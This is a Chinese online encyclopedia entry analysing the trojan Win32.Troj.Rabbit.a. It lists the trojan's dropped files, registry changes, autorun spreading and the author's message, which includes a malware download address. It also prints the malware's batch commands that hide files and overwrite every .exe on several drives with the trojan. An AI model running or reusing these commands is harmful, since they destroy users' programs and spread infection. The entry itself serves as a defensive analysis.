当前位置: 王朝网络 >> 百科 >> Win32.Troj.Rabbit.a

Win32.Troj.Rabbit.a

王朝百科·作者佚名 2010-02-06

窄屏简体版字體: 小|中|大|超大

病毒别名：处理时间：2007-04-09 威胁级别：★

中文名称：病毒类型：木马影响系统：Win 9x/ME,Win 2000/NT,Win XP,Win 2003

病毒行为:

该病毒是一个木马。该病毒会直接替换c盘program files和其他盘的exe文件。

1、生成的文件

%SystemRoot%system32JK.exe

%SystemRoot%system32loveRabbit.exe

%SystemRoot%system32Rabbit.exe

%SystemRoot%system32love.bat

%SystemRoot%system32msexch400.dll

%SystemRoot%system32loveRabbit.bat

%SystemRoot%msconfig.inf

%SystemRoot%msconfig1.inf

%C:%Rabbit.exe

%C:%AutoRun.inf

2、添加启动项

HKLMSOFTWAREMicrosoftActive SetupInstalled Components{4bf41072-b2b1-21c1-b5c1-0305f4155515}

"StubPath" = "%SystemRoot%system32JK.exe..."

3、删除下列注册表信息

HKLMSYSTEMCurrentControlSetControlSafeBootMinimal{4D36E967-E325-11CE-BFC1-08002BE10318}

HKLMSYSTEMCurrentControlSetControlSafeBootNetwork{4D36E967-E325-11CE-BFC1-08002BE10318}

4、病毒作者留言

I LOVE Rabbit ,and you ? look:http://z82325777.diy.myrice.com/Rabbit.***

-----------------------------------------------

hello~

QQ:373717104

E-MAIL:z8232577@163.com

Welcome!

http://post.baidu.***/f?ct=&tn=baiduKeywordSearch&rn=&pn=&lm=&kw=%BA%DA%BF%CD&rs2=0&myselectvalue=1&word=%BA%DA%BF%CD&submit=%B0%D9%B6%C8%CB%D1%CB%F7&tb=on&tn=mozillacncb

baidu黑客吧

-------------------------------------------

5、在c，d，e，f，g盘里生成autorun启动

------------------------------------

[autorun]

Label=本地磁盘

Shellexecute=Rabbit.exe

------------------------------------

6、将该病毒生成文件设置为隐藏和系统属性

attrib +s +h %SystemRoot%system32msexch400.dll

attrib +s +h d:Rabbit.exe

attrib +s +h e:Rabbit.exe

attrib +s +h c:Rabbit.exe

attrib +s +h f:Rabbit.exe

attrib +s +h g:Rabbit.exe

attrib +s +h h:Rabbit.exe

attrib +s +h e:AutoRun.inf

attrib +s +h f:AutoRun.inf

attrib +s +h c:AutoRun.inf

attrib +s +h d:AutoRun.inf

attrib +s +h h:AutoRun.inf

attrib +s +h g:AutoRun.inf

7、该病毒会替换c盘program files和d，e，f，g盘中的exe文件

---------------------------------------------------------------------

FOR %%a in ( d: e: f: h: g: ) do dir /s/b %%a*.exe>>%SystemRoot%msconfig.inf

cd C:Program Files

dir *.exe /s /b >>%SystemRoot%msconfig1.inf

FOR /f "delims=" %%i in (%SystemRoot%msconfig.inf) do copy /y "%SystemRoot%system32Rabbit.exe" "%%i"

FOR /f "delims=" %%i in (%SystemRoot%msconfig1.inf) do copy /y "%SystemRoot%system32Rabbit.exe" "%%i"

-------------------------------------------------------------------------

8、该病毒通过u盘传播。

9、该病毒下载地址http://www.beecool.net/Rabbit.***

点击展开全文

上一篇：Backdoor/RBot.gfr

下一篇：鞭叶铁线蕨

免责声明：本文为网络用户发布，其观点仅代表作者个人观点，与本站无关，本站仅提供信息存储服务。文中陈述内容未经本站证实，其真实性、完整性、及时性本站不作任何保证或承诺，请读者仅作参考，并请自行核实相关内容。

2023年上半年GDP全球前十五强
百态 2023-10-24

美众议院议长启动对拜登的弹劾调查
百态 2023-09-13

上海、济南、武汉等多地出现不明坠落物
探索 2023-09-06

印度或要将国名改为“巴拉特”
百态 2023-09-06

男子为女友送行，买票不登机被捕
百态 2023-08-20

手机地震预警功能怎么开？
干货 2023-08-06

女子4年卖2套房花700多万做美容：不但没变美脸，面部还出现变形
百态 2023-08-04

住户一楼被水淹还冲来8头猪
百态 2023-07-31

女子体内爬出大量瓜子状活虫
百态 2023-07-25

地球连续35年收到神秘规律性信号，网友：不要回答！
探索 2023-07-21

全球镓价格本周大涨27%
探索 2023-07-09

钱都流向了那些不缺钱的人，苦都留给了能吃苦的人
探索 2023-07-02

倩女手游刀客魅者强控制（强混乱强眩晕强睡眠）和对应控制抗性的关系
百态 2020-08-20

美国5月9日最新疫情：美国确诊人数突破131万
百态 2020-05-09

荷兰政府宣布将集体辞职
干货 2020-04-30

倩女幽魂手游师徒任务情义春秋猜成语答案逍遥观：鹏程万里
干货 2019-11-12

倩女幽魂手游师徒任务情义春秋猜成语答案神机营：射石饮羽
干货 2019-11-12

倩女幽魂手游师徒任务情义春秋猜成语答案昆仑山：拔刀相助
干货 2019-11-12

倩女幽魂手游师徒任务情义春秋猜成语答案天工阁：鬼斧神工
干货 2019-11-12

倩女幽魂手游师徒任务情义春秋猜成语答案丝路古道：单枪匹马
干货 2019-11-12

倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野：与虎谋皮
干货 2019-11-12

倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野：李代桃僵
干货 2019-11-12

倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野：指鹿为马
干货 2019-11-12

倩女幽魂手游师徒任务情义春秋猜成语答案金陵：小鸟依人
干货 2019-11-12

倩女幽魂手游师徒任务情义春秋猜成语答案金陵：千金买邻
干货 2019-11-12